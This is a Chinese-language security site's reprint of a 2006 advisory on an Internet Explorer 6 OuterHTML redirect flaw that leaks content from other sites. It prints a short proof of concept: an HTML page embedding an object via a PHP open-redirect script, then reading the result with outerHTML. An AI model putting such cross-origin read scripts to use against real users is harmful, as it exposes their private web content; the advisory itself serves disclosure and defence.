首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 安全知识 > OuterHTML重新定向信息泄露漏洞
【标  题】:OuterHTML重新定向信息泄露漏洞
【关键字】:OuterHTML
【来  源】:http://www.cublog.cn/u/2056/showart.php?id=134164

OuterHTML重新定向信息泄露漏洞

受影响系统:
Microsoft Internet Explorer 6.0
描述:
BUGTRAQ  ID: 18682

Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer在处理网页中的OuterHTML对象时存在漏洞,可能导致敏感信息泄露。

如果攻击者向Web Server上传了以下文件的话:

------------------------- i.html -------------------------
<html><body onload="setTimeout('alert(o.object.documentElement.outerHTML)',1000)">
<object width=100 height=100 data=r.php?http://www.google.com/123456789 type=text/html id=o></object>
</body></html>
------------------------- r.php -------------------------
<?php header("Location: ".$_SERVER["QUERY_STRING"]); ?>

则在IE在打开i.html时就会显示Google Web页面的内容。

<*来源:Plebo Aesdi Nael (plebo@gmx.net
  
  链接:http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060627/3d930eda/PLEBO-2006.06.16-IE
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

------------------------- i.html -------------------------
<html><body onload="setTimeout('alert(o.object.documentElement.outerHTML)',1000)">
<object width=100 height=100 data=r.php?http://www.google.com/123456789 type=text/html id=o></object>
</body></html>
------------------------- r.php -------------------------
<?php header("Location: ".$_SERVER["QUERY_STRING"]); ?>
 
 
AzDGDatingPlatinum<:【上一篇】
IP地址分类ABC:【下一篇】
【相关文章】
  • innerHTML,outerHTML,innerText,outerText的区别
  • 【随机文章】
  • 仅用PHP4 Session实现的迷你购物篮(一)
  • 性能测试用例模板及相关
  • 动感首页更新实现之六 ------ 首页删除篇
  • Painter 8 手绘教程-数码水彩篇(2)
  • 太好了
  • 利用Java实现zip压缩/解压缩
  • hibernate 关联查询Ⅱ
  • 文档下载
  • Windows 2000的“隐形”武器(上)
  • 令人不解的 roles 属性
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 软讯网络 All Rigths Reserved.